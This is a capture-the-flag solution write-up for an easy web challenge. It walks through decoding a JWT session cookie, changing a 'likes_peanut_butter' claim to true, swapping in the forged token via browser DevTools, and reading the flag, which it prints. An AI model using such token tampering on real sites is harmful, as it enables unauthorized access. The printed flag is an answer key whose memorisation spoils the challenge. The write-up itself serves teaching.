ig-ctf-solutions/write-ups-challenges-2024-2025
3
0
Fork 0
Code Issues Actions Packages Projects Releases Wiki Activity
42ae878989
write-ups-challenges-2024-2025/peanutbutter-challenges/peanutbutter-brand/SOLUTION.md
Abel Stuker 26039148eb feat: add peanutbutter challenges
2024-11-25 22:31:56 +01:00

21 lines
2.0 KiB
Markdown
Raw Blame History

## Difficulty
Easy
## Category
Web
## How To Solve
This time, simply modifying the URL doesn't help.
When you push the 'retrieve' button on the /profile page, you get a message telling you that you can only get the best brand when you like peanut butter. A quick look at the Chrome DevTools Network tab shows that this information is the result of a GET request to the server after the button click. Under the request header, you can see that a cookie named `token` is sent along. This is interesting. ![](devtools_brand_request.png)
When visiting the /profile page, a GET request for profile information is made to the server. The server responds with the information but also requires the browser to set a cookie. That cookie is a JSON Web Token (JWT) with the name `token` in this case. You can use the Chrome DevTools to inspect the cookie. ![](devtools_cookies.png) You can see that the cookie has the value `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6ZmFsc2V9._DG-nLXVTzNw_BoSQ240P6QNL9JbxRz6aWAgPFiXfVU`. You can simple decode this JWT, using an [online tool](https://jwt.io/#debugger-io?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6ZmFsc2V9._DG-nLXVTzNw_BoSQ240P6QNL9JbxRz6aWAgPFiXfVU).
The obtained JSON is:
```json
{
"role": "CTF Participant",
"likes_peanut_butter": false
}
```
In this tool, modify the JSON by setting `likes_peanut_butter` to `true` (this was the requirement for obtaining the 'best brand'). You now get a new JWT: `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJyb2xlIjoiQ1RGIFBhcnRpY2lwYW50IiwibGlrZXNfcGVhbnV0X2J1dHRlciI6dHJ1ZX0.Ndo_jZn8fFltuKiZK9lyVoXyLuiueaPLUmuC7_0Y8j8`.
In you Chrome DevTools, you can change the `token` cookie to the new JWT. Now, simply push the 'retrieve' button again to obtain the flag. Note that you should not refresh the page. That would result in a new GET request to obtain profile information and override the flag again to the old flag.
## Flag
`IGCTF{H3L4ES_PIND4K44SSSSSS}`
Reference in New Issue View Git Blame Copy Permalink